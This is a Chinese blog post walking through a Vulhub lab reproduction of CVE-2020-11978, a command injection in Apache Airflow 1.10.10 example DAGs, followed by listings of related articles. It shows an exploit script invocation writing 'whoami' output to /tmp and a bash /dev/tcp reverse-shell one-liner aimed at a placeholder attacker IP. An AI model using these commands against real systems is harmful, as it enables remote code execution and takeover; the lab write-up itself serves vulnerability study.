airflow CVE-2020-11978复现

已于 2023-03-08 15:26:17 修改
阅读量165 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络
于 2023-03-08 15:25:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203741/article/details/129404122
版权
文章介绍了ApacheAirflow1.10.10版本中存在的命令注入漏洞,该漏洞允许攻击者通过未过滤的用户输入执行任意命令。复现过程包括使用特定的攻击脚本在tmp目录下创建文件以验证漏洞,甚至可以反弹shell。建议受影响版本的用户尽快采取措施进行安全更新。
摘要由CSDN通过智能技术生成

简介:

Apache Airflow是一个开源平台,用于开发、调度和监控面向批处理的工作流平台

官网地址:https://airflow.apache.org/

漏洞原理

Apache Airflow 1.10.10及之前版本中的 example DAGs存在命令注入漏洞。该漏洞源于用户输入构造执行命令过程中,网络系统或产品未能正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞运行任意命令

受影响版本

Apache Airflow <=1.10.10

漏洞复现

Vulhub

进入目录后docker-compose up -d 启动

使用docker ps 查看 正在运行的容器

 

漏洞复现

  1. 登录IP:8080

版本为1.10.10

有了框架名称和具体版本思路

1、先搜索一下该平台存在的历史漏洞

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

https://www.cnvd.org.cn/flaw/list

或者直接百度搜索

搜索到了 复现也就简单了,直接参考文章一步步做就可以了

首先还是先看看原理

Apache Airflow 1.10.10及之前版本中的 example DAGs存在命令注入漏洞。该漏洞源于用户输入构造执行命令过程中,网络系统或产品未能正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞运行任意命令

直接使用 exp攻击脚本即可

为了方便验证,还是在tmp目录下创建文件好查看一些

python .\CVE-2020-11978.py http://192.168.159.140:8080 "whoami >>/tmp/123.txt"

 成功写入文件

还可以反弹shell

先监听端口

bash -i >& /dev/tcp/自己IP/port 0>&1;#

正义的小偷
关注
专栏目录
[ vulhub漏洞复现篇 ] Airflow dag中的命令注入漏洞复现 CVE-2020-11978
qq_51577576的博客
12-20 833
[ vulhub漏洞复现篇 ] Airflow dag中的命令注入漏洞复现 CVE-2020-11978 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。
Apache Airflow 错误的会话验证漏洞 (CVE-2020-17526)利用
weixin_40418457的博客
06-22 1055
0x01 漏洞描述 Apache 官方在2020年12月21日发布的邮件中披露Apache Airflow 存在一个由于错误处理会话验证导致的未授权访问漏洞。如果用户使用了默认的秘钥配置,攻击者就可以在其他的一个配置了默认秘钥的站点进行登录,接着以登录后的session信息直接未授权访问受害者站点。 引用:https://mp.weixin.qq.com/s/EN4bsZl1ylpAtpIlISK3nQ 0x02 漏洞利用 FOFA指纹: title=="Airflow - Login&q
CVE-2020-11978Airflow dag中的命令注入漏洞复现【vulhub靶场】
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
06-18 3331
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。基于vulhub靶场的CVE-2020-11978漏洞复现airflow dag中的命令注入RCE和反弹shell教学。漏洞复现。......
CVE-2020-11978 Apache Airflow 示例dag中的命令注入漏洞复现
ierciyuan的博客
08-01 673
CVE-2020-11978 Apache Airflow 示例dag中的命令注入漏洞复现。测试漏洞并反弹shell。
漏洞复现——Apache Airflow 示例dag中的命令注入(CVE-2020-11978
m0_65149086的博客
05-26 443
懵逼日常
漏洞复现----48、Airflow dag中的命令注入(CVE-2020-11978)
七天
07-04 1574
Airflow dag中的命令注入(CVE-2020-11978)
Apache Airflow 命令注入 (CVE-2020-11978)漏洞复现
weixin_56537388的博客
11-08 168
Apache Airflow 是一个开源的分布式任务调度框架。在 1.10.10 之前的版本中,示例 DAG 中存在一个命令注入漏洞,该漏洞导致攻击者在工作进程中执行任意命令。
Apache Airflow Celery 消息中间件命令执行漏洞复现CVE-2020-11981)
Tauil的博客
08-14 1789
利用Airflow的CeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflow的celery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
CVE-2020-11978
08-10
回答:CVE-2020-11978是Apache Airflow中的一个命令注入漏洞。根据引用中提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场中的CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-...
简单的Apache AirflowCVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1561
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
CVE-2020-11989 漏洞复现
克豪的博客
11-24 1670
这里的 shiro 拦截器需要设置成map.put("/admin/*", "authc"); 这里有两种poc,都是可以绕过 admin/a%25%32%66a /;/admin/aaa 第一种情况 /admin/a%25%32%66a——>传入到shiro自动解码一次变成/admin/a%2fa——>经过 decodeRequestString 变成/admin/a/a 由于这里我们的拦截器是map.put("/admin/*", "authc");,这里需要了解一下shiro的UR
【vulhub】搭建与问题记录
weixin_49422491的博客
04-29 1239
参考链接 解决: 下载好之后,每次启动一个靶场的时候都需先进去相应的目录,然后2.1 启动docker 2.2、 docker依赖启动 2.3、 关闭环境 用完之后记得在对应目录使用这个关闭命令关闭环境,我以为把,云搭建的如果不关的话,会被学安全的小伙伴玩坏的~哈哈哈哈,我害怕。也不知道关了会不会安全些,但养成好习惯,用完就关掉总是好的。 二、本地Ubuntu虚拟机搭建vulhub 依旧是搜了一下别人怎么搭建的。然后,跟着这个博客搭建了vulhub。然后我问我朋友要怎么访问,他说“172.18.1.0:
Celery Redis未授权访问命令执行利用
fnmsd的博客
07-10 7323
Celery在队列中间件未授权的情况下命令执行的利用。
4.网络编程
weixin_45476535的博客
09-14 348
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
Java-网络
2301_81543552的博客
09-14 469
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 114
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
如何在DPDK中实现协议解析?
Do my best!
09-10 676
在 DPDK 中实现协议解析涉及几个步骤,包括初始化环境、配置网卡、接收数据包、解析数据包并处理数据包。下面将详细介绍这些步骤以及如何在 DPDK 中实现基本的协议解析。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-11 886
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
拥塞控制算法为何失效,网络为何难以测量?
最新发布
Netfilter
09-14 1861
所以你知道实验室仿真的宇宙第一算法为啥拉了吧,也就不用再问为什么部署了 bbr 却还不如 cubic 了吧,如果你还希望研发一个精准的,普适的端到端算法,我劝你改行去卖皮鞋,至少还有很多经理市场。这和上一篇说的测量系统容量的方法并不矛盾,因为对于网络传输系统而言,系统是动态变化的,在流量部署到系统上并开始传输时,没有全局视图,就不能指望全局公平,留下的 gap 是固有的,没法靠算法弥补。,超级经典的一篇论文,我推荐过不止一次,因此我本文不谈异构问题,说点别的,比如拓扑。对,就是要砸,因为我不干了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值